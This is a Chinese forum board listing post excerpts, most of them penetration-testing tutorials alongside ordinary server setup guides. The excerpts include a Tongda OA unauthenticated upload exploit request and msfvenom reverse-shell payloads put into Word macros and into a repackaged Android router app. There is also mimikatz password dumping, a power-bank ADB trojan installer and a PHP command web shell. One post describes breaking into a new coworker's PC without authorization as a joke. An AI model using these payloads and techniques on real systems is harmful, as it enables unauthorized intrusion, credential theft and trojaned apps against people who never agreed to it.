建站VPS工具综合杂谈
网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。
363个主题在此版面
-
笔者的环境中有几台Linux的服务器,在上传文件的时候通常都是用ssh进行上传。但是文件上传比较慢,而且每次都需要登录ssh。就想着能不能用windows那样,方便快捷呢?Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件。 安装sudo apt-get install sambakali下已经默认安装,直接使用即可。 修改samba的配置文件sudo vi /etc/samba/smb.conf 添加下面内容 [share] path=/home/priess #文件共享的路劲 public=no #禁止匿名访问 writable=yes #写入权限 valid user=priess #登录用户名 注意登录的用户名必须为系统中存在的用户名,如root 给用户名添加密码sudo smbpasswd -a priess填坑 出现Failed to add entry for user 说明你的用户名在系统中不存在,需要添加一个用户名。 列出现有的Samba用户列表: pdbedit -w -L重启samba服务 service smbd restart和windows连接在windows->计算机,点击映射网络驱动器;输入\192.168.1.102\share(请根据自己的ip和共享文件夹标识调整)。此时,就可以在windows上看到linux共享的文件夹了。 访问网络磁盘
-
- 0 篇回复
- 12 次查看
-
-
通达OA是由北京通达信科科技有限公司开发的一款办公系统,近日通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。 攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。 搭建本地环境通达OA下载: 链接:https://pan.baidu.com/s/1QFAoLxj9pD1bnnq3f4I8lg 提取码:ousi 包含漏洞的两个文件: 文件上传:webroot\ispirit\im\upload.php 文件包含:webroot\ispirit\interface\gateway.php 漏洞复现在没有登录的情况下上传文件 我们直接访问 http://localhost//ispirit/im/upload.php 提示:-ERR 用户未登陆 ok,我们在burp中构造数据包 POST /ispirit/im/upload.php HTTP/1.1 Host: 192.168.174.159:80 Content-Length: 602 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.3…
-
- 0 篇回复
- 14 次查看
-
-
工欲其事必先利其器,在渗透测试中一份好的工具,是成功与否的关键所在。利用工具我们可以更加快捷的掌握系统中存在那些漏洞。从而完成一系列的渗透测试。 owaspOWASP是一个开源的、非盈利的全球性安全组织,致力于应用软件的安全研究。我们的使命是使应用软件更加安全,使企业和组织能够对应用安全风险做出更清晰的决策。目前OWASP全球拥有250个分部近7万名会员,共同推动了安全标准、安全测试工具、安全指导手册等应用安全技术的发展。 优点方便 简单 kali默认安装支持中文支持sql xxs 等常见的漏洞扫描结果支持导出 扫描速度快支持网站目录爬行niktoNikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件CGIs;超过625种服务器版本;超过230种特定服务器问题。 优点扫描速度快 支持网站目录爬行支持常见漏洞的扫描支持结果导出 WapitiWapiti 是另一个基于终端的 Web 漏洞扫描器,它发送 GET 和 POST 请求给目标站点,来寻找漏洞。 我们可以从终端窗口打开 Wapiti,例如: wapiti http://192.168.123.66/ -o wapiti_result -f html -m "-blindsql"我们会扫描 vulnerable_vm 中的 Peruggia 应用,将输出保存为 HTML 格式,保存到wapiti_result目录中,并跳过 SQL 盲注检测。 优点支持多种漏洞的扫描 效率更高支持模块化工具支持ssl攻击 ness…
-
- 0 篇回复
- 13 次查看
-
-
nikto是一款著名的web漏洞扫描神器,支持xss sql注入 web目录爬行 敏感目录 信息收集等常用的web漏洞的扫描和发现。 nikto基础使用扫描一个主机 nikto -h 192.168.123.66扫描指定端口 nikto -h 192.168.123.66 -p 80扫描保存结果 nikto -h 192.168.123.66 -p 80 -o bbskali.html 扫描结果 sql注入漏洞在后台登录页面发现sql注入漏洞,利用burp抓包,并进行sql注入。 burp抓包 利用sqlmap获取数据库
-
- 0 篇回复
- 13 次查看
-
-
利用msf获得系统shell后,就完了? no~ 我们的渗透之路才刚刚开始。系统提权,权限维持,这些都是最基本的操作,除了这些还有那些好玩的呢? 获取明文密码如下,我们在msf中获得shell后,载入mimikatz模块load mimikatz 这里提示,需要载入kiwi我们再次载入 获取系统hash值 mimikatz_command -f samdump::hashes 参数说明: user:用户名 NTLM:hash值(如果获取明文失败,我们可以直接利用hashcat暴力破解) 获取密码明文 mimikatz_command -f sekurlsa::logonPasswords full mimikatz_command -f sekurlsa::wdigest 获取目标WiFi密码wifi_list_shared 获取扫雷的位置mimikatz_command -f winmine::infos
-
- 0 篇回复
- 11 次查看
-
-
今天公司来了一位新女同事,此刻的我激动的不行。为了体现我的绅士风度,以及带有IT高手的标签的我。决定是时候表现正真的技术了。 温馨提示拿个镜子,好好看看,能不能满足下面条件。如果不能 一定要注意后果哦! 信息收集幸运的是HR将她安排到了我们同一个楼层。这就意味着和我在同一个局域网内。 作为IT专员对公司电脑的分布情况还是把握的。我们公司的电脑命名都是XXX公司-部门-序号排列的。 废话不说,神器nmap走一波 nmap -p0 192.168.123.1/24 ok,确定了目标。现在对目标进行漏洞扫描。 对于公司的电脑,漏洞我从来就没修复过。当然还有其他原因,这里我就不点明了。给个?自己体会。 针对存在的漏洞进行攻击 查看漏洞详细信息 拿出神器msf搜索漏洞模块 search MS11-030 use auxiliary/dos/windows/llmnr/ms11_030_dnsapi set RHOSTS 192.168.123.66 当然,像ms17_010这样的漏洞我是从来不修复的,就是方便后面…… 不以调戏为目标的渗透都不叫渗透进入shell命令下,执行下面命令: mshta vbscript:CreateObject("Wscript.Shell").popup("你好,新来的同事。有什么帮助可以找我哦!bbskali.cn",7,"来自一位绅士的温馨提示:",64)(window.close) 不以勾引为目标的渗透都不叫渗透作为一个宅男,不可能就这么调戏下就行了,手速快,口上也要灵活。通过各种灵活作为,成功…
-
- 0 篇回复
- 13 次查看
-
-
memcached是一套分布式的高速缓存系统,由LiveJournal的Brad Fitzpatrick开发,但被许多网站使用。这是一套开放源代码软件,以BSD license授权发布。memcached缺乏认证以及安全管制,这代表应该将memcached服务器放置在防火墙后。 安装memcached分为服务器端和客户端 我们首先安装服务端 使用yum来安装memcached: yum install memcache*启动/usr/bin/memcached -d -l 127.0.0.1 -p 11211 -m 500 -u root参数说明:-d:守护进程。当从终端窗口退出的时候memcached还会继续运行 -l:指定ip地址,这里我们指定本地ip -p:指定端口号,端口号为11211 -m:分配内存,这里我分配了500M内存 -u:使用哪个用户运行memcached 客户端安装安装php-memcache 扩展 注意:笔者这里的PHP环境为7.1 wget https://github.com/websupport-sk/pecl-memcache/archive/NON_BLOCKING_IO_php7.zip unzip NON_BLOCKING_IO_php7.zip cd pecl-memcache-NON_BLOCKING_IO_php7/ /usr/local/Cellar/[email protected]/7.1.20/bin/phpize ./configure --enable-memcache --with-…
-
- 0 篇回复
- 14 次查看
-
-
REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类型。 环境centos7php7.1redis(4.2.0 我用了5.2.1的版本,最后安装并不成功,查了一下php7.1支持4.2.0。) 安装下载安装包 下载地址: http://pecl.php.net/package/redis wget -c http://pecl.php.net/get/redis-4.2.0.tgz 解压tar -zvxf redis-4.2.0.tgz用phpize生成configure配置文件 /usr/bin/phpize查看php-config 的路径 whereis php-configphp-config: /usr/bin/php-config /usr/share/man/man1/php-config.1.gz 编译安装./configure --with-php-config=/usr/bin/php-config make && make install出现下面情况说明安装成功 配置php.…
-
- 0 篇回复
- 12 次查看
-
-
nmap是渗透测试中最重要的神器之一。通过nmap扫描我们可以知道当前主机或者服务器开启了那些端口。通过开启的端口,便可进行下一步的渗透测试。当然,利用nmap我们可以扫面当前局域网中在线的设备。分析局域网中设备的安全性。 Ping扫描在nmap中提供了很多的扫描方式,其中ping就是最常用的一种方式。在扫描时只需要加入-sP就可以开启ping扫描。 nmap -sP 192.168.123.1/24 优点:不会返回太多无用的结果造成对结果的分析,并且比较高效。 缺点:部分设备有时扫不到,需多扫描几次。 无ping扫描ping扫描虽然简单,但是当开启了禁ping后,以上方法便行不通了。这时我们便可以用无ping扫描。 只需要添加参数-p0即可实现。 nmap -p0 192.168.123.1/24 优点:可避免防火墙的发现,可以详细的看到设备开启了那些端口。 缺点: 暂无 TCP Syn Ping扫描TCP Syn Ping即传输层的TCP/IP扫描,通过发送和接收报文的形式进行扫描,在这种情况下每个端口都会轻易的被发现。 命令: nmap -PS 192.168.123.1/24 优点:扫描更加精确 TCP ACK PING扫描很多防火墙会封锁SYN报文,所以nmap提供了SYN和ACK两种扫描方式,这两者的结合大大的提高了逃避防火墙的概率。 nmap -PA 192.168.123.1/24在实际中我们通常将 ps 和pa两个参数放到一起,这样效果会更好。 UDP扫描使用UDP扫描,nmap会发送一个空的报文到主机,如果返回则说明…
-
- 0 篇回复
- 14 次查看
-
-
网络钓鱼是我们日常最为常见的一种攻击手法,其目的是通过各种社会工程学的方法,让目标打开含有恶意代码的word excel ppt等文档。从而获取系统权限,本期教程来说说如何防御这种攻击! 首先我们利用msf生成vbsmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.95 LPORT=4444 -f vba -o try.vba 设置word新建一个word文档,文件另存为启用宏的word文档 然后开发工具——visual Basic 选择我们的项目ThisDocument双击打开,粘贴我们生成的shell。 保存完成后,配置msf。 msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST ip LHOST => 106.13.39.165 msf5 exploit(multi/handler) > set LPORT 5555 LPORT => 5555当目标运行word文档后,在msf中便会得到反弹!
-
- 0 篇回复
- 15 次查看
-
-
首先来看看效果 代码<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>css3-scanner</title> <style> .qr-scanner { position: relative; height: 200px; width: 200px; margin: 0px auto;/*此处为了居中*/ background:url("er.jpg"); background-repeat: no-repeat; } .qr-scanner .box { width: 30vw; height: 30vw; max-height: 30vh; max-width: 30vh; position: relative; left: 50%; top: 50%; transform: translate(-50%, -50%); overflow: hidden; border: 0.1rem solid rgba(0, 255, 51, …
-
- 0 篇回复
- 11 次查看
-
-
自kali更新到2020版后,默认取消了root用户的登录权限。只能用普通用户登录,这样做的优点在于对于kali的新手,在不懂的部分命令的情况下对系统的损害有所降低,也就说安全性提高了。但是普通用户权限实在太低,习惯了root权限的我们在2020中如何设置登录密码呢? 重启系统,进入下面这个界面时按E 按↓到linux开头的一行。 修改ro quiet splash为rw quiet splash init=/bin/ 按F10保存后进入单用户模式 执行passwd root命令修改密码 然后重启,便可以用root身份登录了!
-
- 0 篇回复
- 17 次查看
-
-
在我们更新kali时,由于网络、断电、异常关机、或其他的人为因素导致kali更新没有完成。而直接关机,重启后发现界面黑屏只有一个光标闪动。此时怎么办呢? 解决方法同时按住ctrl+ALT+F2出现命令行登录窗口。 我们登录系统后再次执行apt-get upgrade查看提示,根据提示解决即可! 或者执行dpkg --configure -a即可完美解决
-
- 0 篇回复
- 7 次查看
-
-
首先做一次简单的分析,本次CTF共两关,第一关为图片隐藏,第二关为https的暴力破解。总奖金池金额为166元,摄影小狂人贝贝获得第一名,JUST RUN获得第二名。首先恭喜两位了! 首先来看看战绩吧 当然,小伙伴们都顺利拿到了奖金。其余小伙伴瓜分的奖金! 奖金公布 CTF writeup访问:http://106.13.39.165:66/ 开局一张图 本题考查的是图片隐写 解题方法参考摄影狂人小贝贝的方法(因为太懒,我没写 ) CTF解题思路
-
- 0 篇回复
- 10 次查看
-
-
SG11即SourceGuardian安全组件,目前是PHP运用中较为重要和安全级别较高的安全组件。有一部分系统默认状态下未安装或启用SG11,而有的开源系统需要开启sg11才能安装使用,本教程教你如何安装PHP7.1的SG11。 下载 SG11百度云盘下载 提取码:bx6y 确定你的php版本在终端输入php -v查看当前版本 如我的版本是7.1那么更具我们的系统,复制对应的sg文件。 我的是7.1则复制ixed.7.1.lin到我的更目录 这里我为了方便,直接放在了root目录下。 即:/root/sg11/ixed.7.1.lin 配置php.ini命令: vim /etc/php.ini在里面增加一条: extension=/root/sg11/ixed.7.1.lin保存后重启服务器即可! 验证我们利用php探针查看,要是有SourceGuardian则说明安装成功!
-
- 0 篇回复
- 11 次查看
-
-
Usbrip(源自“USB Ripper”,而不是“USB RIP”惊人)是一个开源取证工具,带有CLI界面,可让您跟踪USB设备工件(即USB事件历史记录,“已连接”和“已断开连接”事件) Linux机器。 安装我们利用pip安装即可! pip install usbrip 示例usbrip events history -ql -n 100查询历史记录 如上图,在2020-03-20 02:25:59有个Android设备插入了USB。 这个是LINUX上查看USB的使用记录,那么在Windows下该怎么查看呢? 其实很简单,我们在cmd中执行下面命令即可: for /f %i in ('reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR') do @for /f %x in ('reg query "%i"') do @reg query "%x" /v FriendlyName | findstr FriendlyName
-
- 0 篇回复
- 7 次查看
-
-
具有很多功能,包括元数据编辑器,SQL编辑器,丰富的数据编辑器,ERD,数据导出/导入/迁移/备份,SQL执行计划等。 基于Eclipse平台。使用插件架构,并为以下数据库提供附加功能:MySQL / MariaDB,PostgreSQL,Greenplum,Oracle,DB2 LUW,Exasol,SQL Server,Sybase / SAP ASE,SQLite,Firebird,H2,HSQLDB,Derby,Teradata,Vertica,Netezza,Informix等。 环境支持:需要安装Java环境 下载官网下载 使用 连接数据库 数据库-新建数据库 选择数据库的类型,连接即可! linux的安装下载.deb包,执行命令 dpkg -i xxx.deb即可完成安装!
-
- 0 篇回复
- 8 次查看
-
-
随着Fluxion的更新,越来越多的小伙伴觉得Fluxion越来越不好玩了。变得越来越复杂,没有以前的旧版本简单实用。其实程序的更新是一件很好的事情,因为更新往往意味着解决以往的Bug,和全新的体验。NOW就让我们一起踩坑吧! 首先还是硬件方面: 在前面的几篇文章中,我经常提到。对于WiFi钓鱼推荐网卡型号为3070。这里我们不再多说。 关于Fluxion的安装 安装相对来说,还是很简单的,我们根据官方给出的安装文档安装即可。 git clone https://www.github.com/FluxionNetwork/fluxion.git cd fluxion ./fluxion.sh然而大多数人在这里常常安装失败,问题在于你的源有问题。kali如何更新源,请移步文章 《kali更新源》 如需手动安装模块,只需要执行apt-get install xxx后跟缺失的模块 这里我们以FLUXION 6.5 作为演示 在终端执行./fluxion.sh 选1 这时会分配你的无线网卡为监听模式,在新版中支持对5GWiFi的支持。 扫描周围的WiFi 按ctrl+c停止。 然而,在新版中最大的问题是在这里 很多人在这里就不会搞了,在旧版中fluxion会自动抓取WiFi的包,而新版中放弃了这个功能,需要我们收到抓。这门这里只需要填写我么抓到包的路劲即可。如/root/66.cap 其他的就和旧版一样了。 这里在填一个坑,有的小伙伴在最后一步建立钓鱼WiFi时会卡在开始建立钓鱼热点AP这是因为你的网卡问题,如8187的网卡就有…
-
- 0 篇回复
- 6 次查看
-
-
对于WIFI破解,总的来说方法就是那么几种。也没什么特别的技术含量。这么多年了,还是停留在以前陈旧的抓包破解的过程。也没有新的攻击方式,但是相信随着信息技术的发展。越来越多的技术漏洞也会说着披露。 启动fern wifi cracker在kali的菜单中,找到无线攻击模块,里面就有fern wifi cracker 选择无线网卡并扫描网络选择你的无线网卡wlan如果没有,则说明你的网卡不支持。 然后点击第二个,骚等片刻即可出现要攻击的WiFi。 这里扫描需要等待会儿 设置字典位置,开始破解。 总结相对来说,破解还是很简单的。纯属傻瓜式一步到位!破解的成功率也是依靠字典,所以比款工具仅仅适合新手入门!
-
- 0 篇回复
- 25 次查看
-
-
本教程纯属虚构,里面涉及到的思路仅供吹牛。请勿非法使用,造成法律后果请自负! 什么是恶意充电宝 准备树莓派(虚拟机下没有尝试,因为需要安装手机的驱动。理论上应该也是可以的。)充电宝外壳(有条件的可以尝试利用3D打印,自己做一个外壳。) -数据线 安装ADB在树莓派中执行 apt-get install adb如果失败,请更新你的源为国内阿里云或中科大的源。 验证在终端中输入 adb如下,则证明安装完成。 配置手机在设置中开启 开发者选项—USB试调即可。 开始测试将手机和树莓派用数据线连接 这里提示是在充电,我们来看看在不知不觉中我们是如何进入手机的。 终端执行 adb devices 其中 34fb90f30704 device就是我们刚才连接的手机。 比如这时想指定 34fb90f30704 这个设备来运行 adb 命令获取屏幕分辨率: adb -s 34fb90f30704 shell wm size 显示手机中的所有应用adb shell pm list packages 其他命令参见列表 安装apk利用这个功能,我们可以把msf木马安装到我们的目标手机,方便我们测试! 命令格式: adb install [-lrtsdg] <path_to_apk>参数: adb install 后面可以跟一些可选参数来控制安装 APK 的行为,可用参数及含义如下: 如:adb install -g /root/11.apk 效果如下: 文件管理复制设备里的文件到电脑命令: adb pull <设备里的文件路…
-
- 0 篇回复
- 21 次查看
-
-
AdGuard 是拥有可获取最佳网络冲浪体验所需全部功能的独特程序。其组合了世界上最高级的广告拦截器,隐私保护模块以及家长控制 - 可协同任何浏览器和应用工作。 在树莓派下安装wget https://static.adguard.com/adguardhome/release/AdGuardHome_linux_arm.tar.gz tar xvf AdGuardHome_linux_arm.tar.gz sudo ./AdGuardHome -s install一旦启动并运行,您可以在浏览器中输入以下内容,在端口3000上访问您的AdGuard Home Web界面 - http://192.168.10.20:3000/进行安装。 注意,如果你的的是VPS请在安全组中开启3000 80 等端口 接着下一步 设置web的端口,默认80这里我改成了81因为我本地80端口有web环境。为了避免冲突我改成了81。 设置管理员密码 到这里,我们就安装完成了,现在根据提示我们进行配置,我们这里以路由器为基础进行配置。 配置路由器登录路由器,在网络设置中修改DNS 这里将DNS修改为我们树莓派的ip 如果是电脑或者安卓手机,将dns改为127.0.0.1和树莓派ip 开始配置在浏览器中输入http://树莓派ip:81即可登录管理页面。 配置你的AdGuard在过滤——自定义过滤规则中添加我们的规则。 这里我们以屏蔽小米广告为例: ||douyin.com^ ||api.assistant.miui.com^$importan…
-
- 0 篇回复
- 12 次查看
-
-
ServerStatus-Toyo版是一个酷炫高逼格的云探针、云监控、服务器云监控、多服务器探针 该探针又服务器端和客户端两方面构成,服务端只安装一个,客户端需要在监控的VPS上面安装。 一、服务器端安装登录服务器,下载脚本。 附件下载 下载完成后,上传到服务器。 在终端执行 status.sh s 需要注意的是,由于网络环境的问题,安装过程可能会失败。多尝试几次即可!!! 1.2设置端口这里默认回车即可(35601)需要注意的是,需要在安全组中放行改端口。 1.3 配置web由于我们的服务器已经配置好了web环境,所以这里我们选择N 然后,我们到宝塔或者Apache中新建虚拟主机,并且解析到目录/usr/local/ServerStatus/web 如上,看到如上所示,证明我们的服务端就安装完成。 1.4 验证在浏览器中输入你刚才解析的域名或者ip地址,要是能够访问探针页面,则说明安装成功。 安装客户端登录需要被监控的服务器 下载一键安装脚本(同服务器端脚本) 客户端脚本 2.1安装客户端在终端执行 status.sh c 按1选择安装客户端 2.2 输入服务器端的IP,或者服务器端配置的域名这里的ip地址或者域名为你的服务端的ip或者域名,如果你的客户端和服务器在同一服务器。默认127.0.0.1即可。 2.3 输入端口默认即可(要和服务端的端口一样) 2.4 为本台服务器添加客户端用户名及密码 保存好刚才设置的账号和密码,后面再服务端添加节点的时候要用。 这样,我们的客户端就安装和配置完成了。现在我们返回到服务端添加节点即…
-
- 0 篇回复
- 12 次查看
-
-
本示例仅为学习研究所用,使用请准守《网络安全法》。造成一切后果,自行承担。本站不但任何责任!!! 前期的准备某路由器管理APP(luyou.apk)kali Linux手机(android 10) 01 生成Android shell在生成之前,确定本机的ip地址。 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.93 LPORT=5555 R > 66.apk这样我们便生成了一个名为66.apk的android shell 02 反编译刚才生成的shell和正常appapktool d 66.apk apktool d luyou.apk 反编译后的效果 03 注入PAYLOAD-1 进入luyou文件夹,打开AndroidManifest.xml文件 -2 搜索关键字Launch和Main找到所对应启动的smail文件,说白了就是找app启动文件路径 当前的启动路径为:com/mercury/mercuryrouterLaunchActivity 打开文件LaunchActivity.smali搜索onCreat函数,找到bundle对象,换行添加启动PAYLOAD代码: invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 04 将木马文件中的smali文件复制到载体smali文件夹中cp -r 66/smali/com/* l…
-
- 0 篇回复
- 10 次查看
-
-
利用Python对mysql进行读写操作,创建数据库,插入数据,更新数据,删除数据等操作。 连接数据库#!/usr/bin/python #-*- coding: UTF-8 -*- import MySQLdb #打开数据库连接 db = MySQLdb.connect("localhost", "testuser", "test123", "TESTDB", charset='utf8' ) #使用cursor()方法获取操作游标 cursor = db.cursor() #使用execute方法执行SQL语句 cursor.execute("SELECT VERSION()") #使用 fetchone() 方法获取一条数据 data = cursor.fetchone() print "Database version : %s " % data #关闭数据库连接 db.close()创建数据库表#!/usr/bin/python #-*- coding: UTF-8 -*- import MySQLdb #打开数据库连接 db = MySQLdb.connect("localhost", "testuser", "test123", "TESTDB", charset='utf8' ) #使用cursor()方法获取操作游标 cursor = db.cursor() #如果数据表已经存在使用 execute() 方法删除表。 cursor.execute("DROP TABLE IF EXISTS EM…
-
- 0 篇回复
- 12 次查看
-
-
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 安装git clone https://github.com/tegal1337/Shelly cd Shelly pip install -r requirements.txt 安装模块 使用启动python3 shell.py生成一个shell python3 shell.py -g "kali" -p "88888" 分析代码<?php ($_GET['passwd'] == '888888') ? NULL : exit; system($_GET['c']); shell_exec($_GET['c']); ?>
-
- 0 篇回复
- 8 次查看
-